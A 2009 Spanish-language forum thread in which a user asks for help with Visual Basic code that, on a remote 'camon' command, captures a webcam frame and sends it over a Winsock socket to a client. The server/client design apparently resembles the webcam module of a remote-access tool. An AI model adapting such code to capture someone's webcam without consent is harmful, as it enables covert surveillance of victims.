elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  transferir la captura!!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: transferir la captura!!  (Leído 1,883 veces)
?¿?

Desconectado Desconectado

Mensajes: 64



Ver Perfil
transferir la captura!!
« en: 22 Enero 2009, 17:37 pm »

hola estoy aver cual es el problema de la transferencia de las captura de la webcam, pongo el codigo, aver si me pueden ayudar, por favor, bueno saludos.

SERVIDOR:

Código:
Private Function camon()
On Error Resume Next
Dim lol As Integer
Dim frago As Integer
Dim goblin As String
lol = FreeFile
frago = 8192
goblin = "c:\Juaz.bmp"
SendMessage mCapHwnd, DISCONNECT, 0, 0
mCapHwnd = capCreateCaptureWindow("WebcamCapture", 0, 0, 0, 320, 240, Me.hwnd, 0)
SendMessage mCapHwnd, Connect, 0, 0
SendMessage mCapHwnd, GET_FRAME, 0, 0
SendMessage mCapHwnd, COPY, 0, 0
SaveClipbrdPicture
Open goblin For Binary As #lol
Do While Not EOF(lol)
camun = Input(frago, #lol)
s.SendData camun
DoEvents
Loop
Close #lol
s.SendData "finalizada"

Código:
Sub SaveClipbrdPicture()
  Call SavePicture(Clipboard.GetData(vbCFBitmap), "C:\juaz.bmp")
End Sub

Código:
Private Sub s_DataArrival(ByVal bytesTotal As Long)
On Error Resume Next
s.GetData datos

'----para la webcam----'
   
If datos = "camon" Then
   camon
   End If


'..................
End Sub



CLIENTE:


Código:
Private Sub S_DataArrival(Index As Integer, ByVal bytesTotal As Long)
Dim lol As Integer
Dim fileprin As Variant
lol = FreeFile
fileprin = "c:\captura.bmp"
S(Index).GetData dat
Open fileprin For Binary As #lol
Seek #lol, LOF(lol) + 1
Put #lol, , dat
Close #lol
If dat = "finalizada" Then
camm.Timer1.Enabled = True
End If

Código:
Private Sub CommandXP7_Click()
On Error Resume Next
Kill ("c:\captura.bmp")
Dim inDeX_x As Variant
inDeX_x = Split(WCC.lst.SelectedItem.Key, "|")
WCC.S(inDeX_x(0)).SendData "camon"
End Sub

MODIFICADO: el problema es que remotamente llegan grises o negras...  :-\ , en mi maquina localmente si funciona bien.


« Última modificación: 22 Enero 2009, 17:46 pm por Orcodd » En línea

?¿?

Desconectado Desconectado

Mensajes: 64



Ver Perfil
Re: transferir la captura!!
« Respuesta #1 en: 23 Enero 2009, 03:35 am »

nadie se digna a ayudarme  :-[


En línea

LeandroA
Moderador
***
Desconectado Desconectado

Mensajes: 760


www.leandroascierto.com


Ver Perfil WWW
Re: transferir la captura!!
« Respuesta #2 en: 23 Enero 2009, 04:24 am »

Hola este es uno que hice

http://rapidshare.com/files/187991857/Camara_Winsock.zip.html

Saludos
En línea

ntaryl

Desconectado Desconectado

Mensajes: 95



Ver Perfil
Re: transferir la captura!!
« Respuesta #3 en: 11 Febrero 2009, 17:55 pm »

Very nice snippet   
someone please upload again   
thanks for the time   
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines